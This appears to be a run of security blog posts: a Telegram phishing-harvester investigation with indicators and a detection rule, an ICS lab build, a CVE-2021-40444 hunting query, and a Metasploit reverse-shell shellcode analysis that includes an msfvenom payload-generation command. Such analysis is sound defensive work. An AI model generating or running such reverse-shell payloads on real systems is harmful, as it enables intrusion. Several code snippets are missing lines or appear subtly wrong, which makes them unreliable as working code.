As the analysis of the 1937990321 campaign’s document exposed harvester credentials, our curiosity led us to identify additional documents and campaigns through VirusTotal Livehunt.

Campaign Operator Bot Lures Victims
1937990321 ade allgood007bot Office 365 400
1168596795 eric jones (stealthrain76745) omystical_bot Office 365, Excel 95
1036920388 PRo \u2714\ufe0f (Emhacker) proimp1_bot M&T Bank, Unknown 127
Figure 4: An overview of Telegram-based campaigns with code-similarity.
Figure 5: A capture of the Excel (left) and US-based M&T Bank (right) lures.

While we managed to identify the M&T Bank campaign (1036920388), we were unable to identify successful phishing attempts. Most of the actor’s harvesting history contained bad data, with occasional stolen data originating from unknown lures. As such, the remainder of this blog post will not take the 1036920388 dataset into account.

To Phished

Throughout the second half of September, the malicious Telegram bots exfiltrated over 3.386 credentials belonging to 495 distinct victims.

Figure 6: Telegram channel messages over time.

If we take a look at the victim repartitions in figure 7, we can notice a distinct phishing of UK-originating accounts.

Figure 7: The victims’ geographical proportions.

Over 94% of the phished accounts belong to the non-corporate Microsoft mail services. These personal accounts are usually more vulnerable as they lack both enterprise-grade protections (e.g.: Microsoft Defender for Office 365) and policies (e.g.: Azure AD Conditional Access Policies).

Figure 8: The victims’ domain proportions.

While the 5% of collected corporate credentials can act as initial access for hands-on-keyboard operations, do the remaining 95% get discarded?

To Phisher

One remaining fact of interest in the 1937990321 campaign’s dataset is the presence of a compromised alisonb account as can be observed in figure 9.

Figure 9: A compromise account re-used for phishing delivery.

The alisonb account is in fact the original account that targeted one of NVISO’s customers. This highlights the common cycle of phishing:

  • Corporate accounts are filtered for initial access.
  • Remaining accounts are used for further phishing.

Identifying these accounts as soon as they’re compromised allows us to preemptively gray-list them, making sure the phishing cycle gets broken.

The Baddies

The Telegram channels furthermore contain records of the actors starting (/start command) and testing their collection methods. These tests exposed two IPs likely part of the actors’ VPN infrastructure:

  • 91[.]132[.]230[.]75 located in Russia
  • 149[.]56[.]190[.]182 located in Canada
Figure 10: The threat actor performing end-to-end tests.

In addition to the above test messages, we managed to identify an actor’s screen capture of the conversation. By cross-referencing the message times with the obtained logs we can assess with high confidence that the 1168596795 campaign operator eric jones‘s device is operating from the UTC+2 time zone in English.

Figure 11: An actor-made screen capture of the test messages.

To further confirm our theory, we can observe additional Telegram messages originating from the above actor IPs. The activity taking place between 9AM (UTC) and 10PM (UTC) tends to confirm the Canadian server is indeed geographically distant from the actor suspected of operating in UTC+2.

Figure 12: The threat actor interactions by time of the day (UTC).

Final Thoughts

We rarely get the opportunity to peek behind a phishing operation’s curtains. While the observed campaigns were quite small, identifying the complete phishing cycle with the alisonb account was quite satisfying.

Our short analysis of the events enabled NVISO to protect its customers from accounts likely used for phishing in the coming days and further act as a reminder of how even obvious phishing emails can be successful nonetheless.

Indicators and Rules


The following files were analyzed to identify harvester credentials. Many more Excel lures can be identified through the EXCELL typo in VirusTotal.

SHA256 Campaign Lure
696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29 1937990321 Office 365
2cc9d3ad6a3c2ad5cced10a431f99215e467bfca39cf02732d739ff04e87be2d 1168596795 Excel
209b842abd1cfeab75c528595f0154ef74b5e92c9cc715d18c3f89473edfeff9 1168596795 Excel
acc4c5c40d11e412bb343357e493d22fae70316a5c5af4ebf693340bc7616eae 1168596795 Excel
b7c8bb9e149997630b53d80ab901be1ffb22e1578f389412a7fdf1bd4668a018 1168596795 Excel
e36dd51410f74fa6af3d80c2193450cf85b4ba109df0c44f381407ef89469650 1168596795 Excel
a7af7c8b83fc2019c4eb859859efcbe8740d61c7d98fc8fa6ca27aa9b3491809 1168596795 Excel
ba9dd2ae20952858cdd6cfbaff5d3dd22b4545670daf41b37a744ee666c8f1dc 1036920388 M&T Bank
36368186cf67337e8ad69fd70b1bcb8f326e43c7ab83a88ad63de24d988750c2 1036920388 M&T Bank
7772cf6ab12cecf5ff84b23830c12b03e9aa2fae5d5b7d1c8a8aaa57525cb34e 1036920388 M&T Bank


//For a VirusTotal Livehunt rule, uncomment the "vt" related statements.
//import "vt"

rule phish_telegram_bot_api: testing TA0001 T1566 T1566_001
        description = "Detects the presence of the Telegram Bot API endpoint often used as egress"
        author      = "Maxime THIEBAUT (@0xThiebaut)"
        date        = "2021-09-30"
        reference   = "https://blog.nviso.eu/2021/10/04/phish-phished-phisher-a-quick-peek-inside-a-telegram-harvester/"
        tlp         = "white"
        status      = "testing"

        tactic      = "TA0001"
        technique   = "T1566.001"

        hash1       = "696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29"

        $endpoint   = "https://api.telegram.org/bot"
        $command    = "/sendMessage"
        $option1    = "chat_id"
        $option2    = "text"
        $option3    = "parse_mode"
        $script     = "<script>"

        all of them //and vt.metadata.file_type == vt.FileType.HTML

Building an ICS Firing Range – Part 2 (Defcon 29 ICS Village)

22 September 2021 at 11:06

As discussed in our first post in the series about our ICS firing range, we came to the conclusion that we had to build a lab ourselves. Now, this turned out to be a quite tricky task and in this blog post I am going to tell you why: which challenges we faced and which choices we made on our way to building our very own lab.
This was a rather long project and involved quite some steps. So to structure this post, I will guide you through the process of how we designed our lab by dividing it into the tasks we worked on in chronological order.

Requirements Analysis

Well, we knew that we were going to build this lab but we needed more information about the exact requirements it should meet so we could focus on those specifically. During internal discussions and meetings with the client we worked out this list of initial, key requirements:

  1. The lab shall feature IT and OT components that represent a realistic bridge-operation scenario.
  2. The lab shall be mobile so it can be transported, set up and worked with on different sites.
  3. The lab shall be extensible: scenarios and both hardware and software components can be added in the future.

These requirements were intentionally left rather broad so that we could work out different feasible concepts for individual challenges and decide with the client which way to go. This approached allowed us to keep in close contact to the client and make sure that we meet their needs.

Designing an ICS Firing Range

In order to build great things, you will need great plans. In this phase, we worked out said plans, starting with our very first concept.

1. The First Concept

Once we knew our key requirements, we started doing our research on the topic of operating bascule bridges. This was certainly easier said than done: it turned that publicly available information about critical infrastructure, such as bridges, was not that easy to find.
Eventually we found a very good resource, the “Bridge Maintenance Reference Manual” provided by the Florida Department of Transportation (FDOT). This manual was a very good find since it detailed the general structure of bascule bridges and explained the most relevant components. Using this, we developed our first, simplified concept:

First 2D Concept of our Bridge Operation Scenario

It features the core components of bascule bridges:

  • Structural components such as the leaves, counterweights and pits (bottom part of the bridges)
  • Drives that move the actual bridge leaves, road barriers and counterweights-locks
  • LEDs that indicate STOP/GO signals for maritime and road traffic
  • An alarm (buzzer) that is turned on and beeps while the leaves are moving
Simple Blender 3D Mock-Up

We translated this into a first, early 3D model in Blender to get an idea of the dimensions and looks. While it was very much simplified, it allowed up to work out some ideas about shapes and placement of components.

This way we found out that a modular setup might provide much needed flexibility for assembly and maintainance: the pits would provide a strong foundation to mount the remaining components onto while the upper part (shown in green-ish color in the picture) would be made of two halves that were set atop the pit. Resting inside the pit there would be a large stepper motor that drove a pinion gear, which in turn drove a rack that is install underneath the bridge leaf.

Satisfied with this concept, we moved on to working on the underlying infrastructure of the lab.

2. Blocking out the Infrastructure

From the start we knew that it would take a good number of systems and networks to represent a somewhat realistic ICS environment: we expected a bridge operator to have an enterprise network that their regular office workstations are connected to, which are probably domain joined. Furthermore, they would have a SCADA network that contains operator workstations for monitoring and controlling the remote bridge-sites, historians to record operational data, and engineering workstations to program PLCs and HMIs. These networks would be routed via a public demilitarized zone (DMZ) over the internet to a remote bridge site. Also, all of these networks would have their own subnets and feature a router that allows adequate routing between the networks and a firewall that specifies individual rules for incoming and outgoing traffic (with a DENY ALL default rule). We decided that virtualizing these machines and networks would be a good compromise between the resources demanded to implement them and the physical space they would take up.

Presumed Local Network Infrastructure of a Bridge Operator

In addition to the IT infrastructure, we also designed the OT part. We intended the diagram below to somewhat represent the lower levels of the Purdue model: There are three substations that represent individual cells for traffic lights, gates and leaf lifting operation. They contain sensors and drives (our level 0 devices, e.g. limit switches and motors) which are controlled by individual PLCs per cell. These PLCs are instructed by one central PLC that is connected to the SCADA network.

Presumed OT Environment of our Bridge Site Scenario

In addition to these rather traditional OT components, our client requested us to include CCTV functionality in the lab. For this we planned to use Raspberry Pis with PiCams.
This network design represented a sufficiently realistic ICS network and allowed for future additions. Time to move on!

3. Figuring Out Which OT Hardware to Use

Now that we knew what things we wanted to interact with physically (those being mainly motors and LEDs) and how to connect them to our lab networks, we started doing our research on suitable OT hardware.

Naturally, we were soon overwhelmed by the sheer amount of devices to choose from: there were plenty of manufacturers that offered loads of different devices for a variety of different use-cases, requirements and budgets with an equally wide variety of different features, dependencies and compatibilities.

Confronted with this challenge (and severely lacking expertise in building OT environments), we decided to make assumptions that helped us trimming down the selection of manufacturers and devices and making educated decisions:

  • We would assume that, for a single operation site, one would stick to devices of one single manufacturer. This allowed us to largely ignore cross-manufacturer-compatibility. We chose SIEMENS for their significant European market-share in ICS hardware.
  • In order to reduce the complextity of building and interconnecting the OT devices, we decided to implement communication via ethernet exclusively and ignore other communication media and interfaces.
  • To represent a realistic and “historically grown” (e.g. occasionally updated and maybe upgraded across decades) operation site, we would use devices of varying EOL (end of life). We decided to include legacy PLCs (S7-300), all-rounder “standard” PLCs (S7-1200), modern high-end PLCs (S7-1500) and standard HMIs (TP700).
Us (left) when we faced dozens datasheets of SIEMENS, ABB and Mitsubishi devices.

At this point, all that was left to do now was to figure out which PLC to use for which task. This required digging through quite some datasheets of the abovementioned PLCs, mainly to find out how many and what digital inputs and outputs the PLCs feature. For example we learned that, to control stepper motors, we needed to create pulse-signals (in our case Pulse-Train-Outputs, PTOs) of up to 100kHz. During our research, a rather cheap signal-board for the S7-1200 turned up that would generate PTOs of up to 200kHz. We ended up using the S7-1200 PLCs to drive the leaves and barriers, the S7-300 to control LEDs and the buzzer and the S7-1500 for orchestration and outbound communication to the virtualized IT environment.

4. Our Vision

With all this information we worked out there, we came up with a vision of what we wanted our lab to look like:

3D concept of the mobile lab

It’s essentially an aluminium frame on wheels, featuring a 3D printed bridge on-top and a steelplate put inside it vertically. The OT components are mounted onto the front-facing side of the steel-plate and the virtualization server running the IT systems and networks is located in the back. The black panels are made of wood and hide the power distribution and the server. It may be hard to pick up visually, but there are acryllic glass panels on the sides and the front to provide a look inside.

With this vision in mind, we set out to build it!

We are going to cover this in the next blog post about our ICS firing range – Stay tuned!

Kusto hunting query for CVE-2021-40444

9 September 2021 at 14:52
By: bparys


On September 7th 2021, Microsoft published customer guidance concerning CVE-2021-40444, an MSHTML Remote Code Execution Vulnerability:

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.


In practice, the attack basically involves a specially-crafted Microsoft Office document, which includes an ActiveX element, which activates the MSHTML component. The vulnerability as such resides in this MSHTML component.

Seeing there is reported exploitation in the wild (ITW), we decided to write a quick Kusto (KQL) rule that allows for hunting in Microsoft Defender ATP.

The query

let process = dynamic(["winword.exe","wordview.exe","wordpad.exe","powerpnt.exe","excel.exe"]);
| where FileName in ("mshtml.dll", "Microsoft.mshtml.dll")
| where InitiatingProcessFileName in~ (process) 
//We only want actual files ran, not Office restore operations etc.
| where strlen(InitiatingProcessCommandLine) > 40
| project Timestamp, DeviceName, InitiatingProcessFolderPath, 
    InitiatingProcessParentFileName, InitiatingProcessParentCreationTime, 

In this query, the following is performed:

  • Add relevant Microsoft Office process names to an array;
  • Add both common filenames for MSHTML;
  • Get a string length larger than 40 characters: this is to weed out false positives, for example where the command line only contains the process in question and a parameter such as /restore or /safe;
  • Display the results.


This was of course tested – a sample set of over 10,000 endpoints across several environments and spanning 7 days, delivered a total of 37 results. These results can be broken down as follows:

Figure 1 – Query Results

None of these processes are anomalous per se:

  • Explorer.exe: graphical user interface, the result of a user opening, for example, Microsoft Word from their Documents folder;
  • Protocolhandler.exe: handles URI schemes in Microsoft Office;
  • Outlook.exe: Microsoft’s email client;
  • Runtimebroker.exe: helps manage permissions from Microsoft Store apps (such as Microsoft Office).

While each of these processes warrant a closer look, you’ll be able to assess quicker if there’s anything anomalous going on by verifying what’s in the InitiatingProcessCommandLine column.

If it contains a remote web address, the file was likely opened from SharePoint or from another online location. If it does not contain a remote web address, the file is stored and opened locally.

Pay special attention to files opened locally or launched by Outlook as parent process: chances are likely this is the result from a phishing email. In case you suspect a true positive:

  • Verify with the user if they have knowledge of opening this file, and if it was from an email they were expecting;
  • If possible, grab a copy of the file and use the option to submit to Microsoft (or a private sandbox of your choice; if public sandbox, then know that what you upload is public to everyone) to further determine if it is malicious;
  • Perform a separate investigation on the user or their device to determine if there’s any other events that may be out of the ordinary.

Ultimately, you can leverage the following process:

  • Run the query for a first time, and for a limited time period (7 days as in our example) or limited set of hosts;
  • Investigate each to create a baseline, and separate the wheat from the chaff (or the true from false positive);
  • Finetune the Kusto query above to your environment;
  • Happy hunting!


A vulnerability actively exploited in the MSHTML component affects in theory all Microsoft Office products that make use of it.

Patch as soon as Microsoft has a patch available (potentially, an out-of-band patch will be created soon) and apply the Mitigations and Workaround as described by Microsoft:


Thanks to our colleagues Remco and Niels for performing unit tests.

Anatomy and Disruption of Metasploit Shellcode

2 September 2021 at 16:04

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit under version v6.0.30-dev. The malicious sample generated using the command below had as resulting SHA256 hash of 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 and is available on VirusTotal for readers willing to have a try themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read on-wards instead of back-wards (e.g.: cmd vs dmc).
  2. The second call operation at ② transfers execution to a function we named Main, this function will contain the main logic of the shellcode.
Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional calls such as the four ones highlighted in the trimmed figure below (③, ④, ⑤ and ⑥). These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.

As such, the first pop instruction from the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offset 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similarly looking push before each call tends to suggest the return address stored within ebp is the dynamic import resolution function.

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is by hashing each available exported function and compare it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws3_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed the instructions following the initial call to Main play a crucial role as what we expect to be the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.


As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length ( BaseDllName.MaximumLength) at ⑪ which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it gets modified into an uppercase. This operation is performed according to the character’s ASCII representation meaning that if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.
Figure 6: Schema depicting the hashing loops of KERNEL32.DLL‘s first character (K).

With the repeated combination of rotations and additions on a fixed registry size (32 bits in edi‘s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produces a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName‘s buffer was not required to be NULL-terminated per Microsoft documentation, extensive testing has showed that NULL-termination was always the case and could generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed
        if b < ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY‘s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follow, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.


Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with as sole difference that character cases are preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The above walked double-linked list can be schematized as the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔) , followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.


The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) &  mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & 0xffffffff
                        # Compute additional representations
                        ida_view = metasploit_hash.to_bytes(size/8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size/8, byteorder='little').hex(' ')
                        # Print CSV entry
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)

As an example, the following PowerShell commands generate a rainbow table, then searches it for the 726774Ch hash we observed first in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.

Execution Flow Analysis

With the import resolving sorted-out, understanding the remaining code becomes a lot more accessible. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws3_32 library is loaded. If not yet loaded, this will map the ws3_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Socket 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).
Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the protocol (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being in big endianness).

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.
Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will firstly focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.


From the shellcode’s perspective only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel where some security solutions can detect/impair either the communications protocol or the surrounding API calls. This attack surface however has the massive caveat that security solutions have to make the distinction between legitimate and malicious behaviors, possibly resulting in some medium/low-confidence detection.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.


If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.


While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, neither is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING‘s buffer (Buffer and MaximumLength) should not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.


One observation we made earlier is how the shellcode loops modules indefinitely until a matching export is found. As we found a flaw to alter hashes, let us analyze what happens if all hashes fail to match.

